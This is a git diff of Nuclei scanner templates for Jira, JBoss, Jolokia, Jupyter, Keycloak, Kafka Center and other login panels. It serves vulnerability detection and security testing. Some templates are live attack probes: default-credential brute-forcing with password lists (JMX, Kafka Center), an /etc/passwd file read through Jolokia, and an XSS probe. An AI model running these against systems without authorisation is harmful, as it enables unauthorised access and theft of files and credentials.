+1,31 @@ +id: jira-unauthenticated-installed-gadgets + +info: + name: Jira Unauthenticated Installed gadgets + author: philippedelteil + severity: info + description: Some Jira instances allow to read the installed gadgets (sometimes it's also possible to read config xml file for some gadgets) + metadata: + max-request: 1 + shodan-query: http.component:"Atlassian Jira" + tags: atlassian,jira + +http: + - method: GET + path: + - "{{BaseURL}}/rest/config/1.0/directory" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'jaxbDirectoryContents' + + - type: status + status: + - 200 + +# digest: 4a0a0047304502210099f7859c8f6312ba07f43ba7d80b6ced1937f1ffc2ae555b1ae5d11f1cdc797d02207e68b09ecc7c8f7767224d8b8e07d539a312323747af7ba36059c9c5bdb4a5c9:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/jira-unauthenticated-popular-filters-8331.yaml b/poc/auth/jira-unauthenticated-popular-filters-8331.yaml deleted file mode 100644 index 0049e91b4e..0000000000 --- a/poc/auth/jira-unauthenticated-popular-filters-8331.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: jira-unauthenticated-popular-filters - -info: - name: Jira Unauthenticated Popular Filters - author: TechbrunchFR - severity: Info - -requests: - - method: GET - path: - - "{{BaseURL}}/secure/ManageFilters.jspa?filter=popular&filterView=popular" - matchers: - - type: word - words: - - 'filterlink_' - -# Remediation: -# Ensure that this permission is restricted to specific groups that require it. -# You can restrict it in Administration > System > Global Permissions. -# Turning the feature off will not affect existing filters and dashboards. -# If you change this setting, you will still need to update the existing filters and dashboards if they have already been -# shared publicly. -# Since Jira 7.2.10, a dark feature to disable site-wide anonymous access was introduced. diff --git a/poc/auth/jira-unauthenticated-popular-filters.yaml b/poc/auth/jira-unauthenticated-popular-filters.yaml index 304d20f9a0..6fbda02ff3 100644 --- a/poc/auth/jira-unauthenticated-popular-filters.yaml +++ b/poc/auth/jira-unauthenticated-popular-filters.yaml @@ -1,9 +1,8 @@ -id: jira-unauth-popular-filters +id: jira-unauthenticated-popular-filters info: name: Jira Unauthenticated Popular Filters author: TechbrunchFR - severity: info - tags: atlassian,jira + severity: Info requests: - method: GET path: diff --git a/poc/auth/jira-unauthenticated-projectcategories-8334.yaml b/poc/auth/jira-unauthenticated-projectcategories-8334.yaml index 3d65baf18e..ff6dcd5d49 100644 --- a/poc/auth/jira-unauthenticated-projectcategories-8334.yaml +++ b/poc/auth/jira-unauthenticated-projectcategories-8334.yaml @@ -4,12 +4,9 @@ info: name: Jira Unauthenticated Project Categories author: TESS severity: info - metadata: - max-request: 1 - shodan-query: http.component:"Atlassian Jira" tags: atlassian,jira -http: +requests: - method: GET path: - "{{BaseURL}}/rest/api/2/projectCategory?maxResults=1000" @@ -31,5 +28,3 @@ http: part: header words: - "atlassian.xsrf.token" - -# digest: 4b0a004830460221008f66b3babbdae57b4672c9d6216a67a6b8ca43341b00e673ace120d7b57348410221008bf9c86ab7e3683d0bf6c23dfd9d5220bdd0f070bcb849fbc025127939852ebd:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/jira-unauthenticated-projectcategories-8332.yaml b/poc/auth/jira-unauthenticated-projectcategories.yaml similarity index 100% rename from poc/auth/jira-unauthenticated-projectcategories-8332.yaml rename to poc/auth/jira-unauthenticated-projectcategories.yaml diff --git a/poc/auth/jira-unauthenticated-user-picker-8341.yaml b/poc/auth/jira-unauthenticated-user-picker-8341.yaml index 0a88ec36aa..0ce9858072 100644 --- a/poc/auth/jira-unauthenticated-user-picker-8341.yaml +++ b/poc/auth/jira-unauthenticated-user-picker-8341.yaml @@ -1,22 +1,14 @@ id: jira-unauthenticated-user-picker - info: name: Jira Unauthenticated User Picker author: TechbrunchFR severity: info - metadata: - max-request: 1 - shodan-query: http.component:"Atlassian Jira" tags: atlassian,jira - -http: +requests: - method: GET path: - "{{BaseURL}}/secure/popups/UserPickerBrowser.jspa" - matchers: - type: word words: - 'user-picker' - -# digest: 490a0046304402200087bccdda4eb25b5110e1333de30442f5744e55aa8f2b5db3cf5d01c54e3837022068d85868176036eb3b1420b5aa186064b791ca1486a60f7e1c8fed872ad1f402:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/jmx-default-login-8355.yaml b/poc/auth/jmx-default-login-8355.yaml deleted file mode 100644 index de4e66a812..0000000000 --- a/poc/auth/jmx-default-login-8355.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: jmx-default-login - -info: - name: JBoss JMX Console Weak Credential - author: paradessia - severity: high - tags: jboss,jmx,default-login - -requests: - - raw: - - | - GET /jmx-console/ HTTP/1.1 - Host: {{Hostname}} - Authorization: Basic {{base64(user + ':' + pass)}} - - attack: clusterbomb - payloads: - user: - - admin - - root - pass: - - admin - - 12345 - - 123456 - - 1234 - - 123456789 - - 123qwe - - root - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - 'JMImplementation' diff --git a/poc/auth/jmx-default-login.yaml b/poc/auth/jmx-default-login.yaml new file mode 100644 index 0000000000..ddf2035a6c --- /dev/null +++ b/poc/auth/jmx-default-login.yaml @@ -0,0 +1,42 @@ +id: jmx-default-login +info: + name: JBoss JMX Console Weak Credential Discovery + author: paradessia + severity: high + description: JBoss JMX Console default login information was discovered. + reference: + - https://docs.jboss.org/jbossas/6/Admin_Console_Guide/en-US/html/Administration_Console_User_Guide-Accessing_the_Console.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + tags: jboss,jmx,default-login +requests: + - raw: + - | + GET /jmx-console/ HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic {{base64(user + ':' + pass)}} + attack: clusterbomb + payloads: + user: + - admin + - root + pass: + - admin + - 12345 + - 123456 + - 1234 + - 123456789 + - 123qwe + - root + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - 'JMImplementation' + +# Enhanced by mp on 2022/03/10 diff --git a/poc/auth/jolokia-unauthenticated-lfi-8366.yaml b/poc/auth/jolokia-unauthenticated-lfi-8366.yaml new file mode 100644 index 0000000000..ca0f994111 --- /dev/null +++ b/poc/auth/jolokia-unauthenticated-lfi-8366.yaml @@ -0,0 +1,31 @@ +id: jolokia-unauthenticated-lfi + +info: + name: Jolokia - Unauthenticated Local File Read + author: dhiyaneshDk + severity: high + description: This exploit allow you to File read with compilerDirectivesAdd + reference: + - https://thinkloveshare.com/hacking/ssrf_to_rce_with_jolokia_and_mbeans/ + - https://github.com/laluka/jolokia-exploitation-toolkit + tags: jolokia,springboot,tomcat,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd" + - "{{BaseURL}}/actuator/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd" + + stop-at-first-match: true + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + - "compilerDirectivesAdd" + condition: and + + - type: status + status: + - 200 \ No newline at end of file diff --git a/poc/auth/jolokia-unauthenticated-lfi-8364.yaml b/poc/auth/jolokia-unauthenticated-lfi.yaml similarity index 100% rename from poc/auth/jolokia-unauthenticated-lfi-8364.yaml rename to poc/auth/jolokia-unauthenticated-lfi.yaml diff --git a/poc/auth/jupyter-ipython-unauth-8402.yaml b/poc/auth/jupyter-ipython-unauth-8402.yaml deleted file mode 100644 index eb7caae150..0000000000 --- a/poc/auth/jupyter-ipython-unauth-8402.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: jupyter-ipython-unauth -info: - name: Jupyter ipython Unauth - author: pentest_swissky - severity: critical - description: Unauthenticated access to Jupyter instance - tags: unauth -requests: - - method: GET - path: - - "{{BaseURL}}/ipython/tree" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - ipython/static/components - - ipython/kernelspecs - part: body diff --git a/poc/auth/jupyter-ipython-unauth-8405.yaml b/poc/auth/jupyter-ipython-unauth-8405.yaml index 7ea15f99a0..eb7caae150 100644 --- a/poc/auth/jupyter-ipython-unauth-8405.yaml +++ b/poc/auth/jupyter-ipython-unauth-8405.yaml @@ -1,21 +1,14 @@ id: jupyter-ipython-unauth - info: - name: Jupyter ipython - Authorization Bypass + name: Jupyter ipython Unauth author: pentest_swissky severity: critical - description: Jupyter was able to be accessed without authentication. - classification: - cvss-score: 10.0 - cvss-metrics: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cwe-id: CWE-288 - tags: unauth,jupyter - + description: Unauthenticated access to Jupyter instance + tags: unauth requests: - method: GET path: - "{{BaseURL}}/ipython/tree" - matchers-condition: and matchers: - type: status @@ -26,5 +19,3 @@ requests: - ipython/static/components - ipython/kernelspecs part: body - -# Enhanced by mp on 2022/05/20 diff --git a/poc/auth/jupyterhub-default-login-8399.yaml b/poc/auth/jupyterhub-default-login-8399.yaml index fbf6bdac5c..52837b9e29 100644 --- a/poc/auth/jupyterhub-default-login-8399.yaml +++ b/poc/auth/jupyterhub-default-login-8399.yaml @@ -1,14 +1,13 @@ id: jupyterhub-default-login - info: name: Jupyterhub Default Login author: For3stCo1d severity: high - reference: https://github.com/jupyterhub/jupyterhub + reference: + - https://github.com/jupyterhub/jupyterhub metadata: shodan-query: http.title:"JupyterHub" tags: jupyterhub,default-login - requests: - raw: - | @@ -17,7 +16,6 @@ requests: Content-Type: application/x-www-form-urlencoded username={{user}}&password={{pass}} - attack: pitchfork payloads: user: @@ -26,7 +24,6 @@ requests: pass: - admin - jupyter - matchers-condition: and matchers: - type: dsl @@ -34,7 +31,6 @@ requests: - contains(tolower(all_headers), 'jupyterhub-session-id=') - contains(tolower(all_headers), 'jupyterhub-hub-login=') condition: and - - type: status status: - - 302 \ No newline at end of file + - 302 diff --git a/poc/auth/jupyterhub-default-login-8400.yaml b/poc/auth/jupyterhub-default-login-8400.yaml deleted file mode 100644 index 8ed406b725..0000000000 --- a/poc/auth/jupyterhub-default-login-8400.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: jupyterhub-default-login -info: - name: Jupyterhub Default Login - author: For3stCo1d - severity: high - reference: https://github.com/jupyterhub/jupyterhub - metadata: - shodan-query: http.title:"JupyterHub" - tags: jupyterhub,default-login -requests: - - raw: - - | - POST /hub/login?next= HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - username={{user}}&password={{pass}} - attack: pitchfork - payloads: - user: - - admin - - jovyan - pass: - - admin - - jupyter - matchers-condition: and - matchers: - - type: dsl - dsl: - - contains(tolower(all_headers), 'jupyterhub-session-id=') - - contains(tolower(all_headers), 'jupyterhub-hub-login=') - condition: and - - type: status - status: - - 302 diff --git a/poc/auth/jwt-token-8408.yaml b/poc/auth/jwt-token-8408.yaml index fe8f403104..55cfb19809 100644 --- a/poc/auth/jwt-token-8408.yaml +++ b/poc/auth/jwt-token-8408.yaml @@ -1,22 +1,15 @@ id: jwt-token - info: name: JWT Token Disclosure author: Ice3man - severity: unknown - metadata: - max-request: 1 - tags: exposure,token,generic - -http: + severity: info + tags: exposure,token +requests: - method: GET path: - "{{BaseURL}}" - extractors: - type: regex part: body regex: - 'eyJ[a-zA-Z0-9]{10,}\.eyJ[a-zA-Z0-9]{10,}\.[a-zA-Z0-9_\-]{10,}' - -# digest: 4b0a004830460221008baff70bdad0aab1fa5268cebae1b9a3689ed519a28b27fea4808128331191ee022100f7261c0a9b531903ab9c3fc69eb93943874995279b02338a89b7624d378d4063:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/jwt-token-8410.yaml b/poc/auth/jwt-token.yaml similarity index 100% rename from poc/auth/jwt-token-8410.yaml rename to poc/auth/jwt-token.yaml diff --git a/poc/auth/kafka-center-default-login-8415.yaml b/poc/auth/kafka-center-default-login-8415.yaml index a7af67b748..6de21b6717 100644 --- a/poc/auth/kafka-center-default-login-8415.yaml +++ b/poc/auth/kafka-center-default-login-8415.yaml @@ -4,19 +4,19 @@ info: name: Apache Kafka Center Default Login author: dhiyaneshDK severity: high + tags: kafka,default-login description: Apache Kafka Center default admin credentials were discovered. reference: - https://developer.ibm.com/tutorials/kafka-authn-authz/ + metadata: + shodan-query: http.title:"Kafka Center" classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 + cve-id: cwe-id: CWE-522 - metadata: - max-request: 1 - shodan-query: http.title:"Kafka Center" - tags: kafka,default-login -http: +requests: - raw: - | POST /login/system HTTP/1.1 @@ -34,6 +34,7 @@ http: matchers-condition: and matchers: + - type: word words: - '"code":200' @@ -44,4 +45,4 @@ http: status: - 200 -# digest: 4a0a00473045022100e5dd96ecc7bca7c106e2aaed38555f28cb2c791d1da55d5cdc7d29f9e91de1d2022040f7f445acbf823452128450f6887c94a6a7c312b9b216074e293f6ccfc5bf83:922c64590222798bb761d5b6d8e72950 +# Enhanced by mp on 2022/03/10 diff --git a/poc/auth/kafka-center-default-login.yaml b/poc/auth/kafka-center-default-login.yaml new file mode 100644 index 0000000000..4bf1b45c64 --- /dev/null +++ b/poc/auth/kafka-center-default-login.yaml @@ -0,0 +1,42 @@ +id: kafka-center-default-login +info: + name: Apache Kafka Center Default Login + author: dhiyaneshDK + severity: high + tags: kafka,default-login + description: Apache Kafka Center default admin credentials were discovered. + reference: + - https://developer.ibm.com/tutorials/kafka-authn-authz/ + metadata: + shodan-query: http.title:"Kafka Center" + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cve-id: + cwe-id: CWE-522 +requests: + - raw: + - | + POST /login/system HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"name":"{{username}}","password":"{{password}}","checkbox":false} + attack: pitchfork + payloads: + username: + - admin + password: + - admin + matchers-condition: and + matchers: + - type: word + words: + - '"code":200' + - '"name":"admin"' + condition: and + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/10 diff --git a/poc/auth/kafka-center-login.yaml b/poc/auth/kafka-center-login.yaml index 62880b87cd..ada0dda642 100644 --- a/poc/auth/kafka-center-login.yaml +++ b/poc/auth/kafka-center-login.yaml @@ -1,18 +1,29 @@ id: kafka-center-login + info: - name: Kafka Center Login + name: Apache Kafka Control Center Login Panel - Detect author: dhiyaneshDK severity: info - tags: panel,kafka + description: Apache Kafka Control Center login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 metadata: + max-request: 1 shodan-query: http.title:"Kafka Center" -requests: + tags: panel,kafka + +http: - method: GET path: - '{{BaseURL}}' - redirects: true + + host-redirects: true max-redirects: 2 matchers: - type: word words: - 'Kafka Center' + +# digest: 4b0a00483046022100fa0996e4674e99919c1e2d9188b560e4a27ed0d3d3eb7721b4bb48a8f411e4a0022100b44b057cdf0044851ddf351c111d4739d2d426de0330056b2fcb13cd8f21c250:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/kasm-login-panel.yaml b/poc/auth/kasm-login-panel.yaml new file mode 100644 index 0000000000..a4cbac9b52 --- /dev/null +++ b/poc/auth/kasm-login-panel.yaml @@ -0,0 +1,49 @@ +id: kasm-login-panel + +info: + name: Kasm Login Panel - Detect + author: lum8rjack + severity: info + description: | + Kasm workspaces login panel was detected. + reference: + - https://kasmweb.com/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cwe-id: CWE-200 + metadata: + verified: true + max-request: 2 + shodan-query: http.favicon.hash:-2144699833 + tags: panel,kasm,login,detect + +http: + - raw: + - | + GET /#/login HTTP/1.1 + Host: {{Hostname}} + - | + POST /api/login_settings HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"token":null,"username":null} + + stop-at-first-match: true + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Kasm' + - 'content="Kasm Server' + - 'content="Kasm Technologies' + - '"html_title": "Kasm' + condition: or + + - type: status + status: + - 200 + +# digest: 490a004630440220523492c7dff31a0b23100c15e4deb72d437b17b07f22eca391a6070e64a3df89022031430e48b3423ea73a82eaa6d8a8cfe0038661b93922e6be710d8c3d0b79f542:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/keenetic-web-login-8442.yaml b/poc/auth/keenetic-web-login-8442.yaml new file mode 100644 index 0000000000..0d24c5fc72 --- /dev/null +++ b/poc/auth/keenetic-web-login-8442.yaml @@ -0,0 +1,19 @@ +id: keenetic-web-login +info: + name: Keenetic Web Login + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6817 + tags: panel +requests: + - method: GET + path: + - '{{BaseURL}}/login#goto=%2Fdashboard' + matchers-condition: and + matchers: + - type: word + words: + - 'Keenetic Web' + - type: status + status: + - 200 diff --git a/poc/auth/keenetic-web-login-8443.yaml b/poc/auth/keenetic-web-login-8443.yaml deleted file mode 100644 index bc9aba324b..0000000000 --- a/poc/auth/keenetic-web-login-8443.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: keenetic-web-login - -info: - name: Keenetic Web Login - author: dhiyaneshDK - severity: info - reference: https://www.exploit-db.com/ghdb/6817 - tags: panel,keenetic - -requests: - - method: GET - path: - - '{{BaseURL}}/login#goto=%2Fdashboard' - - matchers-condition: and - matchers: - - type: word - words: - - 'Keenetic Web' - - type: status - status: - - 200 diff --git a/poc/auth/kenesto-login-8445.yaml b/poc/auth/kenesto-login-8445.yaml index ae45e0681e..8151f43c6f 100644 --- a/poc/auth/kenesto-login-8445.yaml +++ b/poc/auth/kenesto-login-8445.yaml @@ -1,4 +1,5 @@ id: kenesto-login + info: name: Kenesto Login Detect author: pussycat0x @@ -6,10 +7,12 @@ info: metadata: fofa-dork: 'app="kenesto"' tags: login,tech,kenesto + requests: - method: GET path: - "{{BaseURL}}/Kenesto/Account/LogOn?ReturnUrl=%2fkenesto" + matchers-condition: and matchers: - type: word @@ -17,6 +20,7 @@ requests: words: - 'Welcome To Kenesto®' condition: and + - type: status status: - 200 diff --git a/poc/auth/kentico-login-8446.yaml b/poc/auth/kentico-login-8446.yaml deleted file mode 100644 index ed3664810e..0000000000 --- a/poc/auth/kentico-login-8446.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: kentico-login - -info: - name: Kentico Login Panel - author: d4vy - severity: info - reference: https://docs.xperience.io/k8/using-the-kentico-interface - tags: panel,login,kentico - -requests: - - method: GET - path: - - "{{BaseURL}}/CMSPages/logon.aspx" - - redirects: true - max-redirects: 2 - matchers-condition: and - matchers: - - type: dsl - dsl: - - "status_code==200" - - "contains(tolower(body), 'cmspages/getresource.ashx')" - condition: and \ No newline at end of file diff --git a/poc/auth/kentico-login.yaml b/poc/auth/kentico-login.yaml index 9aeddfaad5..5952ac7611 100644 --- a/poc/auth/kentico-login.yaml +++ b/poc/auth/kentico-login.yaml @@ -1,16 +1,28 @@ id: kentico-login + info: - name: Kentico Login Panel + name: Kentico Login Panel - Detect author: d4vy severity: info - reference: https://docs.xperience.io/k8/using-the-kentico-interface + description: Kentico login panel was detected. + reference: + - https://docs.xperience.io/k8/using-the-kentico-interface + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 + metadata: + max-request: 1 tags: panel,login,kentico -requests: + +http: - method: GET path: - "{{BaseURL}}/CMSPages/logon.aspx" - redirects: true + + host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: dsl @@ -18,3 +30,5 @@ requests: - "status_code==200" - "contains(tolower(body), 'cmspages/getresource.ashx')" condition: and + +# digest: 490a004630440220078d50c830b7aa190132f85b41d021bbfa9afd66faaf56cce243bf8fbbedd6e4022013cf168da3ddebdcb992697741bb9e589b6269951be8c333ede07cc3cd1886d6:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/key-cloak-admin-panel.yaml b/poc/auth/key-cloak-admin-panel.yaml index a3d0c21852..26c5d683c8 100644 --- a/poc/auth/key-cloak-admin-panel.yaml +++ b/poc/auth/key-cloak-admin-panel.yaml @@ -1,17 +1,21 @@ id: key-cloak-admin-panel + info: name: Keycloak Admin Panel author: incogbyte,righettod severity: info tags: panel,keycloak + requests: - method: GET path: - "{{BaseURL}}/auth/admin/master/console/" - "{{BaseURL}}/auth/admin" + redirects: true max-redirects: 2 matchers: + - type: word words: - "" diff --git a/poc/auth/keycloak-json-8472.yaml b/poc/auth/keycloak-json-8473.yaml similarity index 100% rename from poc/auth/keycloak-json-8472.yaml rename to poc/auth/keycloak-json-8473.yaml diff --git a/poc/auth/keycloak-json-8474.yaml b/poc/auth/keycloak-json-8474.yaml index 20e0016894..5a557e754a 100644 --- a/poc/auth/keycloak-json-8474.yaml +++ b/poc/auth/keycloak-json-8474.yaml @@ -3,11 +3,13 @@ info: name: Keycloak Json File author: oppsec severity: info - tags: exposure + tags: exposure,keycloak,config + requests: - method: GET path: - "{{BaseURL}}/keycloak.json" + matchers-condition: and matchers: - type: word @@ -16,6 +18,7 @@ requests: - resource - auth-server-url condition: and + - type: status status: - 200 diff --git a/poc/auth/keycloak-openid-config-8475.yaml b/poc/auth/keycloak-openid-config-8475.yaml deleted file mode 100644 index 63e6793964..0000000000 --- a/poc/auth/keycloak-openid-config-8475.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: keycloak-openid-config - -info: - name: Keycloak OpenID Configuration - Detect - author: rodnt - severity: info - description: Keycloak Openid configuration information was detected. - reference: - - https://issues.jboss.org/browse/KEYCLOAK-571 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 - cwe-id: CWE-200 - metadata: - max-request: 2 - tags: keycloak,config,exposure - -http: - - method: GET - path: - - "{{BaseURL}}/.well-known/openid-configuration" - - "{{BaseURL}}/auth/realms/master/.well-known/openid-configuration" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - 'issuer' - - 'authorization_endpoint' - - 'token_endpoint' - - 'userinfo_endpoint' - - 'jwks_uri' - condition: and - -# digest: 4a0a0047304502202046a594d193d1917e5a438527f36b33ee7230c0f035de7c5019809cfa9b2113022100fd74ed3389f1df0bc3eb27dfb579eb6e2d0ed29f38bdb8e69c2de1bcb11523c9:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/keycloak-openid-config.yaml b/poc/auth/keycloak-openid-config.yaml new file mode 100644 index 0000000000..c89a36bcaa --- /dev/null +++ b/poc/auth/keycloak-openid-config.yaml @@ -0,0 +1,25 @@ +id: keycloak-openid-config +info: + name: Keycloak openid-config + author: rodnt + severity: info + reference: https://issues.jboss.org/browse/KEYCLOAK-571 + tags: keycloak,config +requests: + - method: GET + path: + - "{{BaseURL}}/.well-known/openid-configuration" + - "{{BaseURL}}/auth/realms/master/.well-known/openid-configuration" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - 'issuer' + - 'authorization_endpoint' + - 'token_endpoint' + - 'userinfo_endpoint' + - 'jwks_uri' + condition: and diff --git a/poc/auth/keycloak-xss-8481.yaml b/poc/auth/keycloak-xss-8481.yaml index dcd0fb21d4..6e64c100cc 100644 --- a/poc/auth/keycloak-xss-8481.yaml +++ b/poc/auth/keycloak-xss-8481.yaml @@ -2,7 +2,7 @@ id: keycloak-xss info: name: Keycloak <= 8.0 - Cross Site Scripting author: incogbyte - severity: medium + severity: info reference: https://cure53.de/pentest-report_keycloak.pdf tags: keycloak,xss requests: @@ -11,9 +11,6 @@ requests: POST /auth/realms/master/clients-registrations/openid-connect HTTP/1.1 Host: {{Hostname}} Content-Type: application/json - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 - Content-Type: application/x-www-form-urlencoded {"":1} matchers-condition: and diff --git a/poc/auth/keycloak-xss-8482.yaml b/poc/auth/keycloak-xss-8482.yaml index f6bcb0c4dc..8397f21f07 100644 --- a/poc/auth/keycloak-xss-8482.yaml +++ b/poc/auth/keycloak-xss-8482.yaml @@ -1,11 +1,12 @@ id: keycloak-xss + info: name: Keycloak <= 8.0 - Cross Site Scripting author: incogbyte severity: info - reference: - - https://cure53.de/pentest-report_keycloak.pdf + reference: https://cure53.de/pentest-report_keycloak.pdf tags: keycloak,xss + requests: - raw: - | @@ -14,11 +15,13 @@ requests: Content-Type: application/json {"":1} + matchers-condition: and matchers: - type: status status: - 400 + - type: word words: - - 'Unrecognized field ""' + - 'Unrecognized field ""' \ No newline at end of file diff --git a/poc/auth/kiwitcms-login-8496.yaml b/poc/auth/kiwitcms-login-8496.yaml index b65a31ddd7..ae81534fc8 100644 --- a/poc/auth/kiwitcms-login-8496.yaml +++ b/poc/auth/kiwitcms-login-8496.yaml @@ -1,26 +1,23 @@ id: kiwitcms-login - info: name: Kiwi TCMS Login author: pdteam severity: info - reference: https://kiwitcms.org - tags: kiwitcms,panel + reference: + - https://kiwitcms.org metadata: shodan-query: title:"Kiwi TCMS - Login",http.favicon.hash:-1909533337 - + tags: kiwitcms,panel requests: - method: GET path: - "{{BaseURL}}/accounts/login/" - matchers: - type: word words: - "Kiwi TCMS" - extractors: - type: regex group: 1 regex: - - "Version ([0-9.]+)" \ No newline at end of file + - "Version ([0-9.]+)" diff --git a/poc/auth/kubernetes-unauth.yaml b/poc/auth/kubernetes-unauth(1).yaml similarity index 100% rename from poc/auth/kubernetes-unauth.yaml rename to poc/auth/kubernetes-unauth(1).yaml diff --git a/poc/auth/lansweeper-login.yaml b/poc/auth/lansweeper-login.yaml index a5e557ec3d..3b230d6f69 100644 --- a/poc/auth/lansweeper-login.yaml +++ b/poc/auth/lansweeper-login.yaml @@ -1,41 +1,22 @@ id: lansweeper-login - info: - name: Lansweeper Login Panel - Detect + name: Lansweeper Login author: divya_mudgal severity: info - description: Lansweeper login panel was detected. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 - cwe-id: CWE-200 - metadata: - verified: true - max-request: 1 - shodan-query: title:"Lansweeper - Login" tags: lansweeper,tech,panel - -http: +requests: - method: GET path: - "{{BaseURL}}/login.aspx" - - matchers-condition: and + - "{{BaseURL}}/favicon.ico" + stop-at-first-match: true + matchers-condition: or matchers: - type: word name: login words: - "Lansweeper - Login" - - - type: status - status: - - 200 - - extractors: - - type: regex - part: body - group: 1 - regex: - - '"\/js\/CustomControls\.js\?([0-9.]+)" type="text\/javascript"' - -# digest: 490a0046304402207d05e439f57066e26a03f20e56f3f2e638ce161e69e6ea4eddbd4f6bb60fc9a6022004e1fc12be3cbefa9f75dcd9fd90c77aaa9be54c74c63568b4eeb29f1581fbfc:922c64590222798bb761d5b6d8e72950 + - type: dsl + name: favicon + dsl: + - "status_code==200 && (\"1847799946\" == mmh3(base64_py(body)))" diff --git a/poc/auth/linksys-wifi-login.yaml b/poc/auth/linksys-wifi-login.yaml index a28ef47206..7aeab4552b 100644 --- a/poc/auth/linksys-wifi-login.yaml +++ b/poc/auth/linksys-wifi-login.yaml @@ -1,23 +1,36 @@ id: linksys-wifi-login + info: - name: Linksys Smart Wi-Fi + name: Linksys Smart Wi-Fi Login Panel - Detect author: pussycat0x severity: info + description: Linksys Smart Wi-Fi login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 metadata: - shodan-dork: http.title:"Linksys Smart WI-FI" + max-request: 1 + shodan-query: http.title:"Linksys Smart WI-FI" tags: tech,panel,linksys,iot -requests: + +http: - method: GET path: - '{{BaseURL}}' - redirects: true + + host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word part: body words: - "Linksys Smart Wi-Fi" + - type: status status: - 200 + +# digest: 4a0a00473045022100862a7d569fe3b14a2e46cd30065583998919758163679e00322517420aac596d02204f989f06bfc28a0b11ee3de99cb284dc0d690a1b346d176cc5538dae96248fb5:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/lucee-login-8662.yaml b/poc/auth/lucee-login-8662.yaml index cfd166ca3d..6eb66727ff 100644 --- a/poc/auth/lucee-login-8662.yaml +++ b/poc/auth/lucee-login-8662.yaml @@ -1,15 +1,18 @@ id: lucee-login + info: name: Lucee Web/Server Administrator Login author: dhiyaneshDK severity: info reference: https://www.shodan.io/search?query=http.title%3A%22Lucee%22 tags: panel,lucee + requests: - method: GET path: - '{{BaseURL}}/lucee/admin/web.cfm' - '{{BaseURL}}/lucee/admin/server.cfm' + matchers-condition: and matchers: - type: word diff --git a/poc/auth/lucee-login-8664.yaml b/poc/auth/lucee-login-8664.yaml index 5afa24b148..9b77923363 100644 --- a/poc/auth/lucee-login-8664.yaml +++ b/poc/auth/lucee-login-8664.yaml @@ -3,8 +3,8 @@ info: name: Lucee Web/Server Administrator Login author: dhiyaneshDK severity: info - reference: - - https://www.shodan.io/search?query=http.title%3A%22Lucee%22 + metadata: + shodan-query: http.title:"Lucee" tags: panel,lucee requests: - method: GET diff --git a/poc/auth/lucee-login-8665.yaml b/poc/auth/lucee-login-8665.yaml deleted file mode 100644 index 6eb66727ff..0000000000 --- a/poc/auth/lucee-login-8665.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: lucee-login - -info: - name: Lucee Web/Server Administrator Login - author: dhiyaneshDK - severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22Lucee%22 - tags: panel,lucee - -requests: - - method: GET - path: - - '{{BaseURL}}/lucee/admin/web.cfm' - - 